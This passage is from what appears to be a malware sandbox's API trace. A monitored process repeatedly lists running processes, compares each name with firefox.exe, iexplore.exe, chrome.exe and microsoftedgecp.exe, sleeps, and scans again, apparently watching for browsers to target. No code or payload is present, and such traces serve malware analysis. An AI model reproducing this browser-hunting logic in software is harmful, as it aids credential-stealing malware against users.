bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.364] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0194.364] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0194.364] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0194.364] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0194.364] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.364] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0194.365] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0194.365] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0194.365] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0194.365] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.365] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0194.367] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0194.367] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0194.367] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0194.367] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.367] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0194.367] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0194.367] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0194.367] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0194.367] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.367] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0194.368] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0194.368] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0194.368] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0194.368] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.368] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0194.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0194.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0194.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0194.368] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.368] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0194.369] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0194.369] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0194.369] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0194.369] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.369] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0194.369] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0194.369] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0194.369] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0194.370] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.370] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0194.370] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0194.370] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0194.370] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0194.370] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.370] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0194.371] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0194.371] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0194.371] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0194.371] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.371] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0194.371] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0194.371] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0194.371] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0194.371] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.371] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.372] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0194.372] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0194.372] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0194.372] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.372] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.372] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.372] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.372] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.372] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.372] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0194.373] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0194.373] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0194.373] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0194.373] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.373] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.374] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.374] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.374] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.374] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.374] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0194.374] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0194.374] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0194.374] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0194.374] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.374] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0194.375] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0194.375] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0194.375] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0194.375] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.375] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.375] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.375] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.375] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.375] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.375] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0194.376] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0194.376] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0194.376] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0194.376] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.376] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0194.416] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0194.416] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0194.416] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0194.416] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.416] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.416] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.416] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.416] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.416] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.417] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.417] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.417] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.417] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.417] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.417] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.417] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.417] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.418] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0194.418] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0194.418] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0194.418] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0194.418] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0194.418] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0194.419] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0194.419] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0194.419] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0194.419] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0194.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0194.419] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0194.419] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0194.419] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0194.419] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0194.419] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0194.420] CloseHandle (hObject=0xd4) returned 1 [0194.420] Sleep (dwMilliseconds=0x3e8) [0195.430] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0195.432] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.433] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0195.433] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0195.433] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0195.433] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0195.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.433] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0195.433] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0195.433] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0195.433] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0195.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.434] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0195.434] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0195.434] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0195.434] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.434] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0195.434] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0195.434] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0195.434] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.435] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0195.435] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0195.435] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0195.435] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.435] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.435] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0195.436] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0195.436] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0195.436] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.436] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0195.436] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0195.436] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0195.436] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.436] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.437] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0195.437] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0195.437] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0195.437] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.437] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.437] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0195.437] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0195.437] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0195.437] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.437] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0195.438] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0195.438] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0195.438] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0195.438] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0195.438] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.438] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.438] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.438] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.438] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.439] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.439] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.439] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.439] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.439] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.440] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0195.440] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0195.440] Process32Next (in: hSnapshot=0xd4, 